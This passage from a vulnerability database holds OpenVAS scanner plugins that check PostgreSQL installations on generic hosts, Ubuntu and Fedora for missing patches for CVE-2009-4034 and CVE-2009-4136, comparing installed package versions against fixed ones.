{\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:05:48", "bulletinFamily": "scanner", "description": "PostgreSQL is prone to a security-bypass vulnerability because the\n application fails to properly validate the domain name in a signed CA\n certificate, allowing attackers to substitute malicious SSL\n certificates for trusted ones.\n\n PostgreSQL is also prone to a local privilege-escalation vulnerability.", "modified": "2017-10-12T00:00:00", "published": "2009-12-16T00:00:00", "id": "OPENVAS:1361412562310100400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100400", "title": "PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: postgressql_37334.nasl 7406 2017-10-12 06:15:28Z cfischer $\n#\n# PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:postgresql:postgresql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100400\");\n script_version(\"$Revision: 7406 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-12 08:15:28 +0200 (Thu, 12 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-16 12:39:06 +0100 (Wed, 16 Dec 2009)\");\n script_bugtraq_id(37334,37333);\n script_cve_id(\"CVE-2009-4034\",\"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"postgresql_detect.nasl\");\n script_require_ports(\"Services/postgresql\", 5432);\n script_mandatory_keys(\"PostgreSQL/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37334\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37333\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/support/security\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/about/news.1170\");\n\n tag_summary = \"PostgreSQL is prone to a security-bypass vulnerability because the\n application fails to properly validate the domain name in a signed CA\n certificate, allowing attackers to substitute malicious SSL\n certificates for trusted ones.\n\n PostgreSQL is also prone to a local privilege-escalation vulnerability.\";\n\n tag_impact = \"Successfully exploiting this issue allows attackers to perform man-in-the-\n middle attacks or impersonate trusted servers, which will aid in further attacks.\n\n Exploiting the privilege-escalation vulnerability allows local attackers to gain elevated\n privileges.\";\n\n tag_affected = \"PostgreSQL versions prior to 8.4.2, 8.3.9, 8.2.15, 8.1.19, 8.0.23, and\n 7.4.27 are vulnerable to this issue.\";\n\n tag_solution = \"Updates are available. Please see the references for more information.\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"impact\", value:tag_impact);\n script_tag(name:\"affected\", value:tag_affected);\n script_tag(name:\"solution\", value:tag_solution);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"8.4\", test_version2:\"8.4.1\" ) ||\n version_in_range( version:vers, test_version:\"8.3\", test_version2:\"8.3.8\" ) ||\n version_in_range( version:vers, test_version:\"8.2\", test_version2:\"8.2.14\" ) ||\n version_in_range( version:vers, test_version:\"8.1\", test_version2:\"8.1.18\" ) ||\n version_in_range( version:vers, test_version:\"8.0\", test_version2:\"8.0.22\" ) ||\n version_in_range( version:vers, test_version:\"7.4\", test_version2:\"7.4.26\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:16", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-876-1", "modified": "2017-12-01T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840360", "id": "OPENVAS:840360", "title": "Ubuntu Update for PostgreSQL vulnerabilities USN-876-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_876_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that PostgreSQL did not properly handle certificates with\n NULL characters in the Common Name field of X.509 certificates. An attacker\n could exploit this to perform a man in the middle attack to view sensitive\n information or alter encrypted communications. (CVE-2009-4034)\n\n It was discovered that PostgreSQL did not properly manage session-local\n state. A remote authenticated user could exploit this to escalate\n priviliges within PostgreSQL. (CVE-2009-4136)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-876-1\";\ntag_affected = \"PostgreSQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-876-1/\");\n script_id(840360);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"876-1\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_name(\"Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg5\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq4\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:22", "bulletinFamily": "scanner", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066569", "id": "OPENVAS:136141256231066569", "title": "Fedora Core 12 FEDORA-2009-13381 (postgresql)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13381.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13381 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.4.2-1\n- Update to PostgreSQL 8.4.2, for various fixes described at\nhttp://www.postgresql.org/docs/8.4/static/release-8-4-2.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\n- Use -N not the obsolete -n in useradd call\nResolves: #495727\n- Clean up specfile to eliminate rpmlint gripes, mainly by removing\nno-longer-needed provisions for superseding rh-postgresql\n- add sparc/sparc64 to multilib header support\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13381\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66569\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 